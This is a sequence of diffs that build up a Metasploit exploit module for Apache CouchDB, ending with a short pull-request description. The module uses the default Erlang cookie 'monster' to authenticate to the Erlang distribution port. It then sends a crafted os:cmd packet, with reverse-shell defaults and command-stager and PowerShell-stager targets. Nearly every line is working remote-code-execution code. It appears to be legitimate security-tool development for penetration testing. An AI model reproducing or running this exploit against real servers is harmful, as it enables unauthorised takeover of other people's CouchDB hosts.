-  CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
-  COOKIE = 'monster'
-
-
-
   def check
-     true
-  end
-
-  def compile_cmd(cmd)
-    msg = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
-    msg << [cmd.length].pack("S>")
-    msg << cmd
-    msg << "jw\x04user"
-    payload = ("\x70" + CTRL_DATA + msg)
-    return ([payload.size].pack("N*") + payload)
+    # TODO
   end
 
   def get_erlang_ports
     # CONNECT TO EDPM:
     erlang_ports = []
     begin
-      print_status("Connecting to the EDPM socket...")
-      connect(true, {'RHOST'=>datastore['RHOSTS'], 'RPORT'=>datastore['RPORT']})
+      print_status('Connecting to the EDPM socket...')
+      connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })
       # request Erlang nodes
       sock.put(EPM_NAME_CMD)
-      sleep 1 # Fix this
+      sleep datastore['WfsDelay']
       res = sock.get_once
+      fail_with(Failure::UnexpectedReply, 'Did not find any Erlang nodes') unless res && res.include?("\x00\x00\x11\x11name")
       print_status("res: #{res}")
-      fail_with(Failure::UnexpectedReply, "Did not find any Erlang nodes") unless res and res.include?("\x00\x00\x11\x11name")
-      print_status("Success")
-      disconnect
+      print_status('Success')
       res.each_line do |line|
         erlang_ports << line.match(/\s(\d+$)/)[0]
       end
-    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET
-      # Ignored
-    rescue ::Exception => e
-      print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")
+    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+      disconnect
+      print_error("Error: #{e.class} #{e} #{e.backtrace}")
     end
     erlang_ports
   end
 
+  def connect_to_erlang_server(erlang_port)
+    # CONNECT TO ERLANG PORT:
+
+    print_status('Connecting to Erlang Server...')
+    # TODO: Iterate over erlang_ports
+    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })
+    print_status('Connected')
+    sock.put(NAME_MSG)
+    sleep datastore['WfsDelay']
+    sock.get_once(5) # ok message
+    challenge = sock.get_once
+    challenge = challenge[9..12].unpack('N*')[0]
+    challenge_reply = "\x00\x15r\x01\x02\x03\x04"
+    md5 = Digest::MD5.new
+    md5.update(COOKIE + challenge.to_s)
+    challenge_reply << [md5.hexdigest].pack('H*')
+    sock.put(challenge_reply)
+    sleep datastore['WfsDelay']
+    challenge_response = sock.get_once
+
+    if challenge_response.nil?
+      fail_with(Failure::UnexpectedReply, 'Authentication was unsuccessful')
+    end
+    print_status('Erlang challenge and response completed successfully')
+
+    return sock
+  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+    disconnect
+    print_error("Couldn't connect to Erlang server. Error: #{e.class} #{e} #{e.backtrace} ")
+  end
+
+  def compile_cmd(cmd)
+    msg = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
+    msg << [cmd.length].pack('S>')
+    msg << cmd
+    msg << "jw\x04user"
+    payload = ("\x70" + CTRL_DATA + msg)
+    ([payload.size].pack('N*') + payload)
+  end
+
+  def execute_command(cmd, opts = {})
+    payload = compile_cmd(cmd)
+    print_status('sending payload... ')
+    opts[:sock].put(payload)
+    sleep datastore['WfsDelay']
+  end
+
   def exploit
     erlang_ports = get_erlang_ports
-    # CONNECT TO ERLANG PORT:
-    begin
-      print_status("Connecting to Erlang Server...")
-      connect(true, {'RHOST'=>'172.16.199.164', 'RPORT'=>erlang_ports[0].to_i})
-      print_status("Connected")
-
-      print_status(NAME_MSG)
-      sock.put(NAME_MSG)
-
-      sleep 1
-      res = sock.get_once(5) # ok message
-      challenge =  sock.get_once
-      challenge = challenge[9..12].unpack("N*")[0]
-
-
-      print_status("Unpacked  #{challenge}")
-
-      challenge_reply = "\x00\x15r\x01\x02\x03\x04"
-      require 'digest'
-      md5 = Digest::MD5.new
-      md5.update(COOKIE + challenge.to_s)
-
-      # print_status("Cookie + challenge: " + COOKIE + challenge.to_s)
-      # print_status("md5 of Cookie + challenge: " + md5.to_s)
-
-      challenge_reply << [md5.hexdigest].pack('H*')
-
-      # print_status("challenge_reply: #{challenge_reply}")
-      # print_status("challenge_reply length: #{challenge_reply.size}")
-      sock.put(challenge_reply)
-      sleep 1
-      challenge_response = sock.get_once
-
-      if challenge_response.empty?
-        fail_with(Failure::UnexpectedReply, "Authentication was unsuccessful")
+    # TODO: test with multiple ports configured
+    erlang_ports.each do |erlang_port|
+      sock = connect_to_erlang_server(erlang_port.to_i)
+      case target['Type']
+      when :unix_cmd, :win_cmd
+        execute_command(payload.encoded, { sock: sock })
+      when :linux_dropper, :win_dropper, :psh_stager
+        execute_cmdstager({ sock: sock })
+      else
+        fail_with(Failure::BadConfig, 'Invalid target specified')
       end
-
-      payload = compile_cmd("id")
-      print_status("sending payload... ")
-      sock.put(payload)
-      # require 'pry'
-      # binding.pry
-      sleep 1
-      res = sock.get_once
-      print(res)
-
-    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
-       print_error("Couldnt connect to Erlang server. Error: #{e.class} #{e} #{e.backtrace} ")
     end
-
   end
 end

--- a/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
+++ b/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
@@ -1,0 +1,180 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  require 'digest'
+
+  # TARGET = ""
+  # EPMD_PORT = 4369 # Default Erlang distributed port
+  # COOKIE = "monster" # Default Erlang cookie for CouchDB
+  # ERLNAG_PORT = 0
+  # EPM_NAME_CMD = "\x00\x01\x6e" # Request for nodes list
+
+  # Some data:
+  # NAME_MSG  = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".unpack('c*')
+  # CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
+  # CTRL_DATA  = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
+  # CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
+
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Apache Couchdb Erlang Rce',
+        'Description' => %q(
+          Placeholder
+        ),
+        'Author'      =>
+          [
+            'Placeholder', # discovery
+            'Placeholder'  # module
+          ],
+        # 'References'  =>
+        #   [
+        #     [ 'EDB', '' ],
+        #     [ 'URL', ''],
+        #     [ 'CVE', '']
+        #   ],
+        'License'        => MSF_LICENSE,
+        # 'Platform'       => '',
+        'Privileged'     => false ,
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'cmd/unix/reverse_bash'
+          },
+        'Arch'           => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl'
+              },
+              'Payload' => {
+                'Append' => ' & disown'
+              }
+            }
+          ]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2000-01-01'
+      )
+    )
+
+    # Opt::ERLANG_PORT(35703)],
+    register_options(
+      [
+        Opt::RPORT(4369)
+      ]
+    )
+  end
+
+  EPM_NAME_CMD = "\x00\x01\x6e"
+  NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
+  CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04"
+  CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
+  COOKIE = 'monster'
+
+
+
+  def check
+     true
+  end
+
+  def compile_cmd(cmd)
+    msg = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
+    msg << [cmd.length].pack("S>")
+    msg << cmd
+    msg << "jw\x04user"
+    payload = ("\x70" + CTRL_DATA + msg)
+    return ([payload.size].pack("N*") + payload)
+  end
+
+  def get_erlang_ports
+    # CONNECT TO EDPM:
+    erlang_ports = []
+    begin
+      print_status("Connecting to the EDPM socket...")
+      connect(true, {'RHOST'=>datastore['RHOSTS'], 'RPORT'=>datastore['RPORT']})
+      # request Erlang nodes
+      sock.put(EPM_NAME_CMD)
+      sleep 1 # Fix this
+      res = sock.get_once
+      print_status("res: #{res}")
+      fail_with(Failure::UnexpectedReply, "Did not find any Erlang nodes") unless res and res.include?("\x00\x00\x11\x11name")
+      print_status("Success")
+      disconnect
+      res.each_line do |line|
+        erlang_ports << line.match(/\s(\d+$)/)[0]
+      end
+    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET
+      # Ignored
+    rescue ::Exception => e
+      print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")
+    end
+    erlang_ports
+  end
+
+  def exploit
+    erlang_ports = get_erlang_ports
+    # CONNECT TO ERLANG PORT:
+    begin
+      print_status("Connecting to Erlang Server...")
+      connect(true, {'RHOST'=>'172.16.199.164', 'RPORT'=>erlang_ports[0].to_i})
+      print_status("Connected")
+
+      print_status(NAME_MSG)
+      sock.put(NAME_MSG)
+
+      sleep 1
+      res = sock.get_once(5) # ok message
+      challenge =  sock.get_once
+      challenge = challenge[9..12].unpack("N*")[0]
+
+
+      print_status("Unpacked  #{challenge}")
+
+      challenge_reply = "\x00\x15r\x01\x02\x03\x04"
+      require 'digest'
+      md5 = Digest::MD5.new
+      md5.update(COOKIE + challenge.to_s)
+
+      # print_status("Cookie + challenge: " + COOKIE + challenge.to_s)
+      # print_status("md5 of Cookie + challenge: " + md5.to_s)
+
+      challenge_reply << [md5.hexdigest].pack('H*')
+
+      # print_status("challenge_reply: #{challenge_reply}")
+      # print_status("challenge_reply length: #{challenge_reply.size}")
+      sock.put(challenge_reply)
+      sleep 1
+      challenge_response = sock.get_once
+
+      if challenge_response.empty?
+        fail_with(Failure::UnexpectedReply, "Authentication was unsuccessful")
+      end
+
+      payload = compile_cmd("id")
+      print_status("sending payload... ")
+      sock.put(payload)
+      # require 'pry'
+      # binding.pry
+      sleep 1
+      res = sock.get_once
+      print(res)
+
+    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+       print_error("Couldnt connect to Erlang server. Error: #{e.class} #{e} #{e.backtrace} ")
+    end
+
+  end
+end

--- a/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
+++ b/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
@@ -8,14 +8,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Retry
   prepend Msf::Exploit::Remote::AutoCheck
   require 'digest'
 
+  # Constants required for communicating over the Erlang protocol defined here:
+  # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html
   EPM_NAME_CMD = "\x00\x01\x6e".freeze
   NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".freeze
   CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04".freeze
   CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex".freeze
   COOKIE = 'monster'.freeze
+  COMMAND_PREFIX = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k".freeze
 
   def initialize(info = {})
     super(
@@ -27,10 +31,11 @@ class MetasploitModule < Msf::Exploit::Remote
           authenticating and gain admin privileges.
         },
         'Author'	=> [
-          '1F98D',            # Erlang Cookie RCE discovery
-          'Konstantin Burov', # Apache CouchDB Erlang Cookie exploit
-          '_sadshade',        # Apache CouchDB Erlang Cookie exploit
-          'jheysel-r7',       # Msf Module
+          'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery
+          '1F98D',                     # Erlang Cookie RCE exploit
+          'Konstantin Burov',          # Apache CouchDB Erlang Cookie exploit
+          '_sadshade',                 # Apache CouchDB Erlang Cookie exploit
+          'jheysel-r7',                # Msf Module
         ],
         'References' => [
           [ 'EDB', '49418' ],
@@ -39,6 +44,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'License' => MSF_LICENSE,
         'Platform' => ['win', 'linux'],
+        'Payload' => {
+          'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method
+        },
         'Privileged' => false,
         'Arch' => [ ARCH_CMD ],
         'Targets' => [
@@ -104,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
         }
       ),
     )
@@ -119,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     erlang_ports = get_erlang_ports
     # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.
-    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)
+    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?
 
     erlang_ports.each do |erlang_port|
       # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been
@@ -147,9 +155,9 @@ class MetasploitModule < Msf::Exploit::Remote
       sock.put(EPM_NAME_CMD)
       sleep datastore['WfsDelay']
       res = sock.get_once
-      unless res && res.include?("\x00\x00\x11\x11name")
+      unless res && res.include?("\x00\x00\x11\x11name couchdb")
         print_error('Did not find any Erlang nodes')
-        return
+        return erlang_ports
       end
 
       print_status('Successfully found EDPM socket')
@@ -159,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
       print_error("Error connecting to EDPM: #{e.class} #{e}")
       disconnect
-      return
+      return erlang_ports
     end
     erlang_ports
   end
@@ -172,10 +180,17 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')
     connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })
     print_status('Connection successful')
-    sock.put(NAME_MSG)
-    sleep datastore['WfsDelay']
-    sock.get_once(5) # ok message
-    challenge = sock.get_once
+    challenge = retry_until_truthy(timeout: 60) do
+      sock.put(NAME_MSG)
+      sock.get_once(5) # ok message
+      sock.get_once
+    end
+    # The expected successful response from the target should start with \x00\x1C
+    unless challenge && challenge.include?("\x00\x1C")
+      print_error('Connecting to the Erlang server was unsuccessful')
+      return
+    end
+
     challenge = challenge[9..12].unpack('N*')[0]
     challenge_reply = "\x00\x15r\x01\x02\x03\x04"
     md5 = Digest::MD5.new
@@ -199,7 +214,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def compile_cmd(cmd)
-    msg = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
+    msg = ''
+    msg << COMMAND_PREFIX
     msg << [cmd.length].pack('S>')
     msg << cmd
     msg << "jw\x04user"
@@ -209,7 +225,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, opts = {})
     payload = compile_cmd(cmd)
-    print_status('sending payload... ')
+    print_status('Sending payload... ')
     opts[:sock].put(payload)
     sleep datastore['WfsDelay']
   end

--- a/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
+++ b/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
   require 'digest'
 
   EPM_NAME_CMD = "\x00\x01\x6e".freeze
@@ -116,39 +117,61 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # TODO
+    erlang_ports = get_erlang_ports
+    # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.
+    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)
+
+    erlang_ports.each do |erlang_port|
+      # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been
+      # successful and the target as well as the specific socket used in this instance is vulnerable
+      sock = connect_to_erlang_server(erlang_port.to_i)
+      if sock.instance_of?(Socket)
+        @vulnerable_socket = sock
+        return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')
+      else
+        next
+      end
+    end
+    Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be a patched')
   end
 
+  # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers
+  #
+  # @return [Array] An array of port numbers for discovered Erlang Servers.
   def get_erlang_ports
-    # CONNECT TO EDPM:
     erlang_ports = []
     begin
-      print_status('Connecting to the EDPM socket...')
+      print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")
       connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })
       # request Erlang nodes
       sock.put(EPM_NAME_CMD)
       sleep datastore['WfsDelay']
       res = sock.get_once
-      fail_with(Failure::UnexpectedReply, 'Did not find any Erlang nodes') unless res && res.include?("\x00\x00\x11\x11name")
-      print_status("res: #{res}")
-      print_status('Success')
+      unless res && res.include?("\x00\x00\x11\x11name")
+        print_error('Did not find any Erlang nodes')
+        return
+      end
+
+      print_status('Successfully found EDPM socket')
       res.each_line do |line|
         erlang_ports << line.match(/\s(\d+$)/)[0]
       end
     rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+      print_error("Error connecting to EDPM: #{e.class} #{e}")
       disconnect
-      print_error("Error: #{e.class} #{e} #{e.backtrace}")
+      return
     end
     erlang_ports
   end
 
+  # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the
+  # default erlang cookie value in Apache CouchDB installations before 3.2.2
+  #
+  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server
   def connect_to_erlang_server(erlang_port)
-    # CONNECT TO ERLANG PORT:
-
-    print_status('Connecting to Erlang Server...')
-    # TODO: Iterate over erlang_ports
+    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')
     connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })
-    print_status('Connected')
+    print_status('Connection successful')
     sock.put(NAME_MSG)
     sleep datastore['WfsDelay']
     sock.get_once(5) # ok message
@@ -163,14 +186,16 @@ class MetasploitModule < Msf::Exploit::Remote
     challenge_response = sock.get_once
 
     if challenge_response.nil?
-      fail_with(Failure::UnexpectedReply, 'Authentication was unsuccessful')
+      print_error('Authentication was unsuccessful')
+      return
     end
     print_status('Erlang challenge and response completed successfully')
 
-    return sock
+    sock
   rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")
     disconnect
-    print_error("Couldn't connect to Erlang server. Error: #{e.class} #{e} #{e.backtrace} ")
+    return
   end
 
   def compile_cmd(cmd)
@@ -189,18 +214,30 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep datastore['WfsDelay']
   end
 
+  def exploit_socket(sock)
+    case target['Type']
+    when :unix_cmd, :win_cmd
+      execute_command(payload.encoded, { sock: sock })
+    when :linux_dropper, :win_dropper, :psh_stager
+      execute_cmdstager({ sock: sock })
+    else
+      fail_with(Failure::BadConfig, 'Invalid target specified')
+    end
+  end
+
   def exploit
-    erlang_ports = get_erlang_ports
-    # TODO: test with multiple ports configured
-    erlang_ports.each do |erlang_port|
-      sock = connect_to_erlang_server(erlang_port.to_i)
-      case target['Type']
-      when :unix_cmd, :win_cmd
-        execute_command(payload.encoded, { sock: sock })
-      when :linux_dropper, :win_dropper, :psh_stager
-        execute_cmdstager({ sock: sock })
-      else
-        fail_with(Failure::BadConfig, 'Invalid target specified')
+    # If the check method has already been run, use the vulnerable socket that has already been identified
+    if @vulnerable_socket
+      exploit_socket(@vulnerable_socket)
+    else
+      erlang_ports = get_erlang_ports
+      fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)
+
+      erlang_ports.each do |erlang_port|
+        sock = connect_to_erlang_server(erlang_port.to_i)
+        next unless sock.instance_of?(Socket)
+
+        exploit_socket(sock)
       end
     end
   end

--- a/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
+++ b/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb
@@ -9,7 +9,9 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Retry
+  include Msf::Exploit::Powershell
   prepend Msf::Exploit::Remote::AutoCheck
+  require 'msf/core/exploit/powershell'
   require 'digest'
 
   # Constants required for communicating over the Erlang protocol defined here:
@@ -234,8 +236,10 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :unix_cmd, :win_cmd
       execute_command(payload.encoded, { sock: sock })
-    when :linux_dropper, :win_dropper, :psh_stager
+    when :linux_dropper, :win_dropper
       execute_cmdstager({ sock: sock })
+    when :psh_stager
+      execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })
     else
       fail_with(Failure::BadConfig, 'Invalid target specified')
     end


### PR DESCRIPTION
Exploits a default Erlang cookie vulnerability in Apache CouchDB which allows for RCE as the user running the application. 

## Verification
Follow the setup instructions for installing on windows (easier than on linux IMO)
Follow the verification steps 

